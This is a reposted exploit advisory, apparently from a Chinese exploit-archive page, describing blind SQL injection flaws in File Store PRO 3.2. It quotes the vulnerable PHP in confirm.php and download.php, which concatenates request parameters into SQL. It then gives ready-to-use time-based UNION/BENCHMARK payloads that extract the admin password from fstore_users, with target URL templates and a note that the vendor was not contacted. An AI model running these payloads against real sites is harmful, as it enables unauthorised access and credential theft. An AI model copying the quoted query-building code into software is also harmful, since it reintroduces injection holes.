File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

所属分类：网络安全 / Exploit 阅读数： 235

收藏 0赞 0分享

| File Store PRO 3.2 Blind SQL Injection |
|________________________________________|

Download from: http://upoint.info/cgi/demo/fs/filestore.zip

- Need admin rights:
/confirm.php:

复制代码

代码如下:

if(isset($_GET["folder"]) && $_GET["folder"]!="") {
$folder=$_GET["folder"];
} else {
exit("Bad Request");
}
if(isset($_GET["id"]) && $_GET["id"]!="") {
$id=$_GET["id"];
} else {
exit("Bad Request");
}

// Validate all inputs
// Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/
/********************** SepedaTua ****************************/

/* Fields:
$folder
$id
*/
$search = array ('@<script[^>]*?>.*?</script>@si',
'@<[\/\!]*?[^<>]*?>@si',
'@([\r\n])[\s] @',
'@&(quot|#34);@i',
'@&(amp|#38);@i',
'@&(lt|#60);@i',
'@&(gt|#62);@i',
'@&(nbsp|#160);@i',
'@&(iexcl|#161);@i',
'@&(cent|#162);@i',
'@&(pound|#163);@i',
'@&(copy|#169);@i',
'@&#(\d );@e');

$replace = array ('',
'',
'\1',
'"',
'&',
'<',
'>',
' ',
chr(161),
chr(162),
chr(163),
chr(169),
'chr(\1)');

$ffolder = $folder;
$fid = $id;

$folder = preg_replace($search, $replace, $folder);
$id = preg_replace($search, $replace, $id);

-----

$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";
$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";
$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";
if(!$mysql->query($SQL))
{
exit($mysql->error);
}
if($mysql->num<=0)
{
exit("Record not found");
}

POC:
' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin
Site: http://site.xxx/confirm.php?folder=a&id=[SQL]

- Don't need admin rights:
In /download.php:

复制代码

代码如下:

if(!isset($_GET["sig"])) // direct download, no need to login
$MustLogin=1|2|4;
require_once("libs/header.php");
if(!isset($_GET["sig"])) // direct download, no need to login
$userlevel=$CurUser->getlevel();
$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";
if(!$mysql->query($SQL))
{
exit($mysql->error);
}

POC:
' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin
Site:
http://site.xxx/download.php?id=[SQL]

Needs magic_quotes_gpc=off. Vendor not contacted !

--------------------------------------------------------------------

Site: http://rstcenter.com
Site: http://de-ce.net

Good luck !

--------------------------------------------------------------------

更多精彩内容其他人还在看

File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

MS Internet Explorer Recordset Double Free Memory Exploit

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

Linux Kernel

MS Internet Explorer (FTP Server Response) DoS Exploit

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

网络赚钱

站长故事